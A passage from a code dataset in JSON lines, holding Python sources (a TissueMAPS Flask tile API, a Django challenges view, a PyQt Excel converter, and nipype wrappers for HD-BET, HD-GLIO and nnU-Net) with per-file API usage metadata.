[{"api_name": "logging.basicConfig", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 9, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 24, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 56, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 61, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 62, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 75, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 79, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 85, "usage_type": "call"}, {"api_name": "MeCab.Tagger", "line_number": 88, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 91, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 92, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 93, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 149, "usage_type": "call"}, {"api_name": "io_operator.JsonOperator", "line_number": 150, "usage_type": "call"}, {"api_name": "io_operator.JsonOperator", "line_number": 158, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 189, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 198, "usage_type": "call"}, {"api_name": "os.path", "line_number": 198, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 199, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 200, "usage_type": "call"}]} +{"seq_id": "31766735838", "text": "import json\nimport logging\nimport numpy as np\nfrom flask import jsonify, request, send_file\nfrom flask_jwt import jwt_required\nfrom cStringIO import StringIO\nfrom sqlalchemy import case\n\nimport tmlib.models as tm\nfrom tmlib.image import PyramidTile\n\nfrom tmserver.api import api\nfrom tmserver.util import (\n decode_query_ids, decode_form_ids, assert_query_params, assert_form_params\n)\n\nlogger = logging.getLogger(__name__)\n\n\n@api.route(\n '/experiments//channel_layers//tiles',\n methods=['GET']\n)\n@assert_query_params('x', 'y', 'z')\n@decode_query_ids(None)\ndef get_channel_layer_tile(experiment_id, channel_layer_id):\n \"\"\"\n .. http:get:: /api/experiments/(string:experiment_id)/channel_layer/(string:channel_layer_id)/tiles\n\n Sends a :class:`ChannelLayerTile /segmentation_layers//tiles',\n methods=['GET']\n)\n@assert_query_params('x', 'y', 'z')\n@decode_query_ids(None)\ndef get_segmentation_layer_tile(experiment_id, segmentation_layer_id):\n \"\"\"\n .. http:get:: /api/experiments/(string:experiment_id)/segmentation_layers/(string:segmentation_layer_id)/tile\n\n Sends each the geometric representation of each\n :class:`MapobjectSegmentation `\n as a GeoJSON feature collection that intersect with the given Pyramid\n tile at position x, y, z.\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n\n {\n \"type\": \"FeatureCollection\",\n \"features\": [\n \"type\": \"Feature\",\n \"id\": 1,\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [[\n [x1, y1], [x2, y2], ...\n ]]\n },\n \"properties\": {\n \"type\": \"Cells\"\n }\n ...\n ]\n }\n\n :query x: zero-based `x` coordinate\n :query y: zero-based `y` coordinate\n :query z: zero-based zoom level index\n\n :statuscode 200: no error\n :statuscode 400: malformed request\n\n \"\"\"\n # The coordinates of the requested tile\n x = request.args.get('x', type=int)\n y = request.args.get('y', type=int)\n # \"z\" is the pyramid zoom level and \"zlevel\" the z-resolution of the\n # acquired image\n z = request.args.get('z', type=int)\n\n logger.debug(\n 'get tile for segmentation layer %d : x=%d, y=%d, z=%d',\n segmentation_layer_id, x, y, z\n )\n\n # if mapobject_type_name == 'DEBUG_TILE':\n # with tm.utils.ExperimentSession(experiment_id) as session:\n # layer = session.query(tm.ChannelLayer).first()\n # # TODO: \"maxzoom\" should be stored in Experiment\n # maxzoom = layer.maxzoom_level_index\n # minx, miny, maxx, maxy = tm.SegmentationLayer.get_tile_bounding_box(\n # x, y, z, maxzoom\n # )\n # return jsonify({\n # 'type': 'Feature',\n # 'geometry': {\n # 'type': 'Polygon',\n # 'coordinates': [[\n # [maxx, maxy], [minx, maxy], [minx, miny], [maxx, miny],\n # [maxx, maxy]\n # ]]\n # },\n # 'properties': {\n # 'x': x, 'y': y, 'z': z,\n # 'type': 'DEBUG_TILE'\n # }\n # })\n\n with tm.utils.ExperimentSession(experiment_id) as session:\n segmentation_layer = session.query(tm.SegmentationLayer).get(\n segmentation_layer_id\n )\n outlines = segmentation_layer.get_segmentations(x, y, z)\n mapobject_type_name = segmentation_layer.mapobject_type.name\n\n # Try to estimate how many points there are in total within\n # the polygons of this tile.\n # TODO: Make this more light weight by sending binary coordinates\n # without GEOJSON overhead. Requires a hack on the client side.\n if len(outlines) > 0:\n features = [\n {\n 'type': 'Feature',\n 'id': mapobject_id,\n 'geometry': json.loads(geom_geojson_str),\n 'properties': {\n 'type': mapobject_type_name\n }\n }\n for mapobject_id, geom_geojson_str in outlines\n ]\n else:\n features = []\n\n return jsonify({\n 'type': 'FeatureCollection',\n 'features': features\n })\n\n\n@api.route(\n '/experiments//segmentation_layers//labeled_tiles',\n methods=['GET']\n)\n@decode_query_ids(None)\n@assert_query_params('x', 'y', 'z', 'result_name')\ndef get_segmentation_layer_label_tile(experiment_id, segmentation_layer_id):\n \"\"\"\n .. http:get:: /api/experiments/(string:experiment_id)/segmentation_layers/(string:segmentation_layer_id)/labeled_tiles\n\n Sends each the geometric representation of each\n :class:`MapobjectSegmentation `\n as a GeoJSON feature collection that intersect with the given Pyramid\n tile at position x, y, z together with the\n :class:`LabelValues ` for the specified\n tool :class:`Result `.\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n\n {\n \"type\": \"FeatureCollection\",\n \"features\": [\n \"type\": \"Feature\",\n \"id\": 1,\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [[\n [x1, y1], [x2, y2], ...\n ]]\n },\n \"properties\": {\n \"label\": 123\n }\n ...\n ]\n }\n\n :query x: zero-based `x` coordinate\n :query y: zero-based `y` coordinate\n :query z: zero-based zoom level index\n\n :statuscode 400: malformed request\n :statuscode 200: no error\n\n \"\"\"\n # The coordinates of the requested tile\n x = request.args.get('x', type=int)\n y = request.args.get('y', type=int)\n z = request.args.get('z', type=int)\n result_name = request.args.get('result_name')\n\n logger.debug(\n 'get labeled tile for segmentation layer of tool result \"%s\": '\n 'x=%d, y=%d, z=%d', result_name, x, y, z\n )\n with tm.utils.ExperimentSession(experiment_id) as session:\n segmentation_layer = session.query(tm.SegmentationLayer).\\\n get(segmentation_layer_id)\n outlines = segmentation_layer.get_segmentations(x, y, z)\n mapobject_type = segmentation_layer.mapobject_type\n mapobject_type_name = mapobject_type.name\n\n result = session.query(tm.ToolResult).\\\n filter_by(name=result_name, mapobject_type_id=mapobject_type.id).\\\n one()\n\n if len(outlines) > 0:\n mapobject_ids = [c.mapobject_id for c in outlines]\n mapobject_id_to_label = result.get_labels(mapobject_ids)\n features = [\n {\n 'type': 'Feature',\n 'id': mapobject_id,\n 'geometry': json.loads(geom_geojson_str),\n 'properties': {\n 'label': str(mapobject_id_to_label[mapobject_id])\n }\n }\n for mapobject_id, geom_geojson_str in outlines\n ]\n else:\n features = []\n\n return jsonify({\n 'type': 'FeatureCollection',\n 'features': features\n })\n\n", "repo_name": "TissueMAPS/TissueMAPS", "sub_path": "tmserver/tmserver/api/tile.py", "file_name": "tile.py", "file_ext": "py", "file_size_in_byte": 9424, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "tmlib.models.utils.ExperimentSession", "line_number": 46, "usage_type": "call"}, {"api_name": "tmlib.models.utils", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 46, "usage_type": "name"}, {"api_name": "tmlib.models.ChannelLayer", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 47, "usage_type": "name"}, {"api_name": "tmlib.models.ChannelLayerTile", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 52, "usage_type": "name"}, {"api_name": "tmlib.image.PyramidTile.create_as_background", "line_number": 63, "usage_type": "call"}, {"api_name": "tmlib.image.PyramidTile", "line_number": 63, "usage_type": "name"}, {"api_name": "cStringIO.StringIO", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 68, "usage_type": "call"}, {"api_name": "tmserver.api.api.route", "line_number": 20, "usage_type": "call"}, {"api_name": "tmserver.api.api", "line_number": 20, "usage_type": "name"}, {"api_name": "tmserver.util.assert_query_params", "line_number": 24, "usage_type": "call"}, {"api_name": "tmserver.util.decode_query_ids", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 120, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 120, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 120, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 121, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 121, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 121, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 124, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 124, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 124, "usage_type": "name"}, {"api_name": "tmlib.models.utils.ExperimentSession", "line_number": 154, "usage_type": "call"}, {"api_name": "tmlib.models.utils", "line_number": 154, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 154, "usage_type": "name"}, {"api_name": "tmlib.models.SegmentationLayer", "line_number": 155, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 155, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 170, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 180, "usage_type": "call"}, {"api_name": "tmserver.api.api.route", "line_number": 71, "usage_type": "call"}, {"api_name": "tmserver.api.api", "line_number": 71, "usage_type": "name"}, {"api_name": "tmserver.util.assert_query_params", "line_number": 75, "usage_type": "call"}, {"api_name": "tmserver.util.decode_query_ids", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 237, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 237, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 237, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 238, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 238, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 238, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 239, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 239, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 239, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 240, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 240, "usage_type": "name"}, {"api_name": "tmlib.models.utils.ExperimentSession", "line_number": 246, "usage_type": "call"}, {"api_name": "tmlib.models.utils", "line_number": 246, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 246, "usage_type": "name"}, {"api_name": "tmlib.models.SegmentationLayer", "line_number": 247, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 247, "usage_type": "name"}, {"api_name": "tmlib.models.ToolResult", "line_number": 253, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 253, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 264, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 274, "usage_type": "call"}, {"api_name": "tmserver.api.api.route", "line_number": 186, "usage_type": "call"}, {"api_name": "tmserver.api.api", "line_number": 186, "usage_type": "name"}, {"api_name": "tmserver.util.decode_query_ids", "line_number": 190, "usage_type": "call"}, {"api_name": "tmserver.util.assert_query_params", "line_number": 191, "usage_type": "call"}]} +{"seq_id": "28954125551", "text": "from urllib import response\nfrom django.shortcuts import render\nfrom django.http import Http404, HttpResponseNotFound, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.template.loader import render_to_string\n# Create your views here.\n\n\n# def january(request):\n# return HttpResponse(\"Eat no meat for the entire month\")\n\n# def february(request):\n# return HttpResponse(\"Walk for atleast 20 mins everyday!\")\n\n# def march(request):\n# return HttpResponse(\"Learn Django for 20 mins everyday!\")\n\nmonthly_challenges = {\n \"january\" : \"Eat no meat for the entire month\" ,\n \"february\" : \"Walk for atleast 20 mins everyday!\",\n \"march\" : \"Learn Django for 20 mins everyday!\",\n \"april\" : \"Eat no meat for the entire month\" ,\n \"may\" : \"Walk for atleast 20 mins everyday!\",\n \"june\" : \"Learn Django for 20 mins everyday!\",\n \"july\" : \"Eat no meat for the entire month\" ,\n \"august\" : \"Walk for atleast 20 mins everyday!\",\n \"september\" : \"Learn Django for 20 mins everyday!\",\n \"october\" : \"Eat no meat for the entire month\" ,\n \"november\" : \"Walk for atleast 20 mins everyday!\",\n \"december\" : None\n}\n\ndef index(request):\n # list_items = \"\"\n months = list(monthly_challenges.keys())\n\n # for month in months:\n # capitalise_month = month.capitalize()\n # month_path = reverse(\"month-challenge\", args=[month])\n # list_items += f\"
  • {capitalise_month}
  • \"\n \n # response_data = f\"
      {list_items}
    \"\n return render(request, \"challenges/index.html\",{\n \"months\" : months\n })\n\ndef monthly_challenge_by_number(request,month):\n months = list(monthly_challenges.keys())\n\n if month > len(months) :\n return HttpResponseNotFound(\"Invalid month!\")\n\n redirect_month = months[month-1]\n redirect_path = reverse(\"month-challenge\",args=[redirect_month])#/challenge\n return HttpResponseRedirect( redirect_path)\n \ndef monthly_challenge(request, month):\n try:\n challenge_text = monthly_challenges[month]\n return render(request,\"challenges/challenge.html\",{\n \"text\" : challenge_text,\n \"month\" : month\n })\n # response_data = render_to_string(\"challenges/challenge.html\")\n # return HttpResponse(response_data)\n except:\n #response_data = render_to_string(\"404.html\")\n raise Http404()\n ", "repo_name": "Ramanagamani1/Django", "sub_path": "myapp/challenges/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.http.HttpResponseNotFound", "line_number": 51, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 54, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 60, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "20564661331", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n@author: zyj\n@time: 2023/1/5 15:52\n\"\"\"\n\nimport sys\nfrom parseExcel2 import Ui_Dialog\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QFileDialog, QListView\nfrom utils import parseExcel2json\n\nclass UI(QtWidgets.QDialog, Ui_Dialog):\n def __init__(self):\n super(UI, self).__init__()\n self.setupUi(self)\n self.pushButton_selectFile.clicked.connect(self.selectFile)\n self.pushButton_transform.clicked.connect(self.transform)\n\n def selectFile(self):\n self.excelPath, _ = QFileDialog.getOpenFileName(self, \"选择文件\", \"\", \"Excel Files (*.xlsx *.xls *.csv)\")\n print(self.excelPath)\n if self.excelPath:\n self.textBrowser.setText(self.excelPath)\n\n def transform(self):\n if self.excelPath:\n #self.textBrowser.clear()\n self.textBrowser.setText(parseExcel2json(self.excelPath))\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ui = UI()\n ui.show()\n sys.exit(app.exec_())\n", "repo_name": "zyj20200/ZTools", "sub_path": "parseExcel/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1029, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 13, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 13, "usage_type": "name"}, {"api_name": "parseExcel2.Ui_Dialog", "line_number": 13, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 21, "usage_type": "name"}, {"api_name": "utils.parseExcel2json", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 33, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 33, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "27374213317", "text": "from nipype.interfaces.base import (\n TraitedSpec, traits, File, CommandLineInputSpec, CommandLine,\n BaseInterfaceInputSpec, Directory, BaseInterface)\nimport os\nimport glob\nfrom nipype.interfaces.base import isdefined\nfrom core.utils.filemanip import split_filename\ntry:\n from nnunet.inference.predict import predict_from_folder\n import torch\nexcept ModuleNotFoundError:\n print('Cannot find import nnUNet, no brain extraction or tumor '\n 'segmentation can be performed!')\n\n\nBASH_PATH = os.path.abspath(os.path.join(os.path.split(__file__)[0],\n os.pardir, os.pardir, 'bash'))\n\n\nclass HDBetInputSpec(CommandLineInputSpec):\n \n _mode_types = ['accurate', 'fast']\n input_file = File(mandatory=True, desc='existing input image',\n argstr='-i %s', exists=True)\n out_file = traits.Str(argstr='-o %s', desc='output file (or folder) name.')\n mode = traits.Enum(*_mode_types, argstr='-mode %s',\n desc='Fast will use only one set of parameters whereas '\n 'accurate will use the five sets of parameters '\n 'that resulted from our cross-validation as an '\n 'ensemble. Default: accurate')\n device = traits.Str(argstr='-device %s',\n desc='Used to set on which device the prediction will run.'\n 'Must be either int or str. Use int for GPU id or \"cpu\" '\n 'to run on CPU. When using CPU you should consider '\n 'disabling tta. Default for -device is: 0')\n tta = traits.Int(argstr='-tta %i',\n desc='Whether to use test time data augmentation '\n '(mirroring). 1= True, 0=False. Disable this if you are '\n 'using CPU to speed things up! Default: 1')\n post_processing = traits.Int(argstr='-pp %i',\n desc='Set to 0 to disabe postprocessing '\n '(remove all but the largest connected '\n 'component in the prediction. Default: 1')\n save_mask = traits.Int(argstr='-s %i',\n desc='If set to 0 the segmentation mask will not be saved')\n overwrite_existing = traits.Int(argstr='--overwrite_existing %i',\n desc='Set this to 0 if you do not want to'\n ' overwrite existing predictions')\n\n\nclass HDBetOutputSpec(TraitedSpec):\n\n out_file = File(desc='Brain extracted image.')\n out_mask = File(desc='Brain mask.')\n\n\nclass HDBet(CommandLine):\n\n _cmd = 'hd-bet'\n input_spec = HDBetInputSpec\n output_spec = HDBetOutputSpec\n\n def _list_outputs(self):\n outputs = self.output_spec().get()\n outputs['out_file'] = self._gen_outfilename('out_file')\n if isdefined(self.inputs.save_mask and self.inputs.save_mask != 0):\n outputs['out_mask'] = self._gen_outfilename('out_mask')\n\n return outputs\n\n def _gen_outfilename(self, name):\n if name == 'out_file':\n out_file = self.inputs.out_file\n if isdefined(out_file) and isdefined(self.inputs.input_file):\n _, _, ext = split_filename(self.inputs.input_file)\n out_file = self.inputs.out_file+ext\n if not isdefined(out_file) and isdefined(self.inputs.input_file):\n pth, fname, ext = split_filename(self.inputs.input_file)\n print(pth, fname, ext)\n out_file = os.path.join(pth, fname+'_bet'+ext)\n elif name == 'out_mask':\n out_file = self.inputs.out_file\n if isdefined(out_file) and isdefined(self.inputs.input_file):\n _, _, ext = split_filename(self.inputs.input_file)\n out_file = self.inputs.out_file+'_mask'+ext\n# if isdefined(out_file):\n# pth, fname, ext = split_filename(out_file)\n# out_file = os.path.join(pth, fname+'_bet_mask'+ext)\n elif not isdefined(out_file) and isdefined(self.inputs.input_file):\n pth, fname, ext = split_filename(self.inputs.input_file)\n print(pth, fname, ext)\n out_file = os.path.join(pth, fname+'_bet_mask'+ext)\n\n return os.path.abspath(out_file)\n\n def _gen_filename(self, name):\n if name == 'out_file':\n return self._gen_outfilename('out_file')\n elif name == 'out_mask':\n return self._gen_outfilename('out_mask')\n return None\n\n\nclass HDGlioPredictInputSpec(CommandLineInputSpec):\n\n t1 = traits.File(mandatory=True, exists=True, argstr='-t1 %s',\n desc='T1 weighted image')\n ct1 = traits.File(mandatory=True, exists=True, argstr='-t1c %s',\n desc='T1 weighted image')\n t2 = traits.File(mandatory=True, exists=True, argstr='-t2 %s',\n desc='T1 weighted image')\n flair = traits.File(mandatory=True, exists=True, argstr='-flair %s',\n desc='T1 weighted image')\n out_file = traits.Str(argstr='-o %s', desc='output file (or folder) name.')\n\n\nclass HDGlioPredictOutputSpec(TraitedSpec):\n\n out_file = File(desc='Brain extracted image.')\n\n\nclass HDGlioPredict(CommandLine):\n\n _cmd = 'hd_glio_predict'\n input_spec = HDGlioPredictInputSpec\n output_spec = HDGlioPredictOutputSpec\n\n def _list_outputs(self):\n outputs = self.output_spec().get()\n outputs['out_file'] = self._gen_outfilename()\n\n return outputs\n\n def _gen_outfilename(self):\n\n out_file = self.inputs.out_file\n if isdefined(out_file) and isdefined(self.inputs.t1):\n _, _, ext = split_filename(self.inputs.t1)\n out_file = self.inputs.out_file+ext\n if not isdefined(out_file) and isdefined(self.inputs.t1):\n pth, _, ext = split_filename(self.inputs.t1)\n print(pth, ext)\n out_file = os.path.join(pth, 'segmentation'+ext)\n\n return os.path.abspath(out_file)\n\n\nclass NNUnetInferenceInputSpec(CommandLineInputSpec):\n\n input_folder = Directory(exist=True, mandatory=True,\n desc='Input directory', argstr='-i %s')\n output_folder = Directory(genfile=True,\n desc='Output directory', argstr='-o %s')\n model_folder = Directory(mandatory=True, exist=True,\n desc='Folder with the results of the nnUnet'\n 'training.', argstr='-m %s')\n prefix = traits.Str()\n\n\nclass NNUnetInferenceOutputSpec(TraitedSpec):\n\n output_folder = Directory(exist=True, desc='Output directory')\n output_file = File(exists=True, desc='First nifti file inside the'\n ' output folder.')\n\n\nclass NNUnetInference(CommandLine):\n\n _cmd = 'predict_simple.py'\n input_spec = NNUnetInferenceInputSpec\n output_spec = NNUnetInferenceOutputSpec\n\n def _list_outputs(self):\n outputs = self._outputs().get()\n output_folder = self._gen_outfilename()\n outputs['output_folder'] = output_folder\n outputs['output_file'] = sorted(glob.glob(\n os.path.join(output_folder, '*.nii.gz')))[0]\n\n return outputs\n \n def _gen_outfilename(self):\n output_folder = self.inputs.output_folder\n if not isdefined(output_folder) and isdefined(self.inputs.input_folder):\n basepath = '/'.join(self.inputs.input_folder.split('/')[:-1])\n outname = 'nnunet_inference_{}'.format(self.inputs.prefix)\n output_folder = os.path.join(basepath, outname)\n# output_folder = 'nnunet_inference'\n return os.path.abspath(output_folder)\n\n def _gen_filename(self, name):\n if name == 'output_folder':\n return self._gen_outfilename()\n return None\n\n", "repo_name": "TransRadOnc-HIT/RADIANTS", "sub_path": "radiants/interfaces/mic.py", "file_name": "mic.py", "file_ext": "py", "file_size_in_byte": 7931, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.abspath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 16, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 17, "usage_type": "attribute"}, {"api_name": "nipype.interfaces.base.CommandLineInputSpec", "line_number": 20, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.File", "line_number": 23, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits.Str", "line_number": 25, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 25, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Enum", "line_number": 26, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 26, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Str", "line_number": 31, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 31, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Int", "line_number": 36, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 36, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Int", "line_number": 40, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 40, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Int", "line_number": 44, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 44, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Int", "line_number": 46, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 46, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.TraitedSpec", "line_number": 51, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.File", "line_number": 53, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.File", "line_number": 54, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.CommandLine", "line_number": 57, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 66, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 74, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 75, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 77, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 83, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 84, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 89, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "nipype.interfaces.base.CommandLineInputSpec", "line_number": 104, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.File", "line_number": 106, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 106, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.File", "line_number": 108, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 108, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.File", "line_number": 110, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 110, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.File", "line_number": 112, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 112, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Str", "line_number": 114, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 114, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.TraitedSpec", "line_number": 117, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.File", "line_number": 119, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.CommandLine", "line_number": 122, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 137, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 138, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 140, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "nipype.interfaces.base.CommandLineInputSpec", "line_number": 148, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.Directory", "line_number": 150, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.Directory", "line_number": 152, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.Directory", "line_number": 154, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits.Str", "line_number": 157, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 157, "usage_type": "name"}, {"api_name": 